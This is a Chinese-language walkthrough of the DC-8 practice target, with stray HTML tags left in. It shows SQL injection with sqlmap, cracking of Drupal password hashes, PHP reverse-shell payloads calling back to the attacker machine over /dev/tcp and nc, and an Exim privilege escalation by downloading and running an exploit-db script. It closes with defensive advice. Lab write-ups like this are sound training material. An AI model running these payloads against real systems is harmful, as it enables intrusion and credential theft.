Vulhub 靶场训练：DC-8 渗透测试解析<\/h1>

一、环境搭建<\/h2>

网络配置<\/h3>

Kali Linux IP<\/strong>: 192.168.200.14<\/li>
DC-8 靶机 IP<\/strong>: 192.168.200.13 (包含第一个flag)<\/li>

网络模式<\/strong>: NAT或桥接模式<\/li> <\/ul>
兼容性问题解决<\/h3>

若VMware Workstation出现开机错误，可尝试降低DC-8的兼容版本<\/li>
例如：从17.x版本改为16.x版本<\/li> <\/ul>
二、信息收集阶段<\/h2>
1. 扫描同网段存活主机<\/h3>
方法一<\/strong>：使用arp-scan<\/p>
arp-scan -l <\/span><\/span><\/code><\/pre>方法二<\/strong>：使用netdiscover<\/p> netdiscover -r 192.168.200.0\/24 <\/span><\/span><\/code><\/pre>2. 开放端口探测<\/h3> nmap -sV -p- 192.168.200.13 <\/span><\/span><\/code><\/pre>发现开放端口<\/strong>：<\/p> 22端口：SSH服务<\/li> 80端口：HTTP服务<\/li> <\/ul> 3. 目录扫描<\/h3> 检查robots.txt文件<\/li> 注意：大多数禁止爬取的文件可能无法访问<\/li> <\/ul> 三、漏洞探测<\/h2> Web应用分析<\/h3> 使用Drupal CMS，版本为7（不同于DC-8的Drupal 8）<\/li> 发现三个不同URL： http:\/\/192.168.200.13\/?nid=1 http:\/\/192.168.200.13\/?nid=2 http:\/\/192.168.200.13\/?nid=3 <\/code><\/pre> <\/li> 可能存在文件包含和SQL注入漏洞<\/li> <\/ul> SQL注入利用（使用SQLMap）<\/h3> 扫描数据库<\/strong>：<\/li> <\/ol> sqlmap -u "http:\/\/192.168.200.13\/?nid=1"<\/span> --dbs --batch <\/span><\/span><\/code><\/pre> 查询数据表名<\/strong>：<\/li> <\/ol> sqlmap -u "http:\/\/192.168.200.13\/?nid=1"<\/span> -D d7db --tables --batch <\/span><\/span><\/code><\/pre> 查询字段名<\/strong>：<\/li> <\/ol> sqlmap -u "http:\/\/192.168.200.13\/?nid=1"<\/span> -D d7db -T users --columns --batch <\/span><\/span><\/code><\/pre> 查询字段值<\/strong>：<\/li> <\/ol> sqlmap -u "http:\/\/192.168.200.13\/?nid=1"<\/span> -D d7db -T users -C name,pass --dump <\/span><\/span><\/code><\/pre>获取的凭证<\/strong>：<\/p> 账号: admin 密码: $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z<\/code><\/li> 账号: john 密码: $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku\/3if\/oRVZJaz5mKC2vF<\/code><\/li> <\/ul> 四、漏洞利用<\/h2> 1. 密码破解<\/h3> Drupal使用特殊加密的hash密文<\/li> 使用John the Ripper进行爆破：<\/li> <\/ul> vim password.txt # 将hash保存到文件<\/span> <\/span><\/span>john password.txt <\/span><\/span><\/code><\/pre> 破解结果：密码为"turtle"<\/li> <\/ul> 2. Web后台登录<\/h3> 使用john\/turtle凭证成功登录后台<\/li> 尝试上传一句话木马失败<\/li> <\/ul> 3. PHP反弹shell<\/h3> 尝试多种PHP反弹shell方法：<\/p> 方法一<\/strong>：<\/p> <?<\/span>php<\/span> system<\/span>("bash -i > \/dev\/tcp\/192.168.200.14\/8899 0>&1"<\/span>);?><\/span> <\/span><\/span><\/span><\/code><\/pre>方法二<\/strong>：<\/p> <?<\/span>php<\/span> system<\/span>("bash -c 'sh -i &>\/dev\/tcp\/192.168.200.14\/8899 0>&1'"<\/span>);?><\/span> <\/span><\/span><\/span><\/code><\/pre>方法三<\/strong>：<\/p> <?<\/span>php<\/span> exec<\/span>("nc -e \/bin\/bash 192.168.200.14 8899"<\/span>);?><\/span> <\/span><\/span><\/span><\/code><\/pre>执行步骤<\/strong>：<\/p> 在表单提交处勾选"Confirmation page"<\/li> 填写任意联系表单<\/li> 点击发送触发PHP代码<\/li> 成功获取反弹shell<\/li> <\/ol> 4. 权限提升<\/h3> 步骤一<\/strong>：查找SUID权限文件<\/p> find \/ -perm -4000 -print 2>\/dev\/null <\/span><\/span><\/code><\/pre>发现Exim版本为4.89<\/p> 步骤二<\/strong>：搜索并利用EXP<\/p> 在Kali中查找相关EXP：<\/li> <\/ol> searchsploit exim 4.89 <\/span><\/span><\/code><\/pre> 复制EXP到桌面：<\/li> <\/ol> cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/46996.sh shell.sh <\/span><\/span><\/code><\/pre> 启动HTTP服务：<\/li> <\/ol> python -m http.server 8899<\/span> <\/span><\/span><\/code><\/pre>步骤三<\/strong>：在靶机下载并执行EXP<\/p> 下载EXP：<\/li> <\/ol> wget http:\/\/192.168.200.14:8899\/shell.sh <\/span><\/span><\/code><\/pre> 赋予执行权限：<\/li> <\/ol> chmod 777<\/span> shell.sh <\/span><\/span><\/code><\/pre> 执行EXP：<\/li> <\/ol> .\/shell.sh <\/span><\/span><\/code><\/pre> 若第一次执行失败，尝试使用脚本提供的其他参数<\/li> <\/ol> 步骤四<\/strong>：验证提权<\/p> whoami <\/span><\/span><\/code><\/pre>成功显示root权限<\/p> 5. 获取最终flag<\/h3> 进入root目录查看flag文件<\/p> 关键点总结<\/h2> SQL注入<\/strong>：通过nid参数发现注入点，使用SQLMap自动化工具获取数据库信息<\/li> 密码破解<\/strong>：识别Drupal特有的hash格式，使用John破解<\/li> Web后台利用<\/strong>：通过合法凭证进入后台，寻找代码执行点<\/li> 反弹shell<\/strong>：多种PHP代码执行方式，确保可靠性<\/li> 权限提升<\/strong>：通过查找SUID文件和已知漏洞的Exim服务完成提权<\/li> <\/ol> 防御建议<\/h2> 及时更新CMS系统和插件<\/li> 对用户输入进行严格过滤<\/li> 使用强密码策略<\/li> 限制SUID权限文件<\/li> 保持服务软件最新版本<\/li> <\/ol>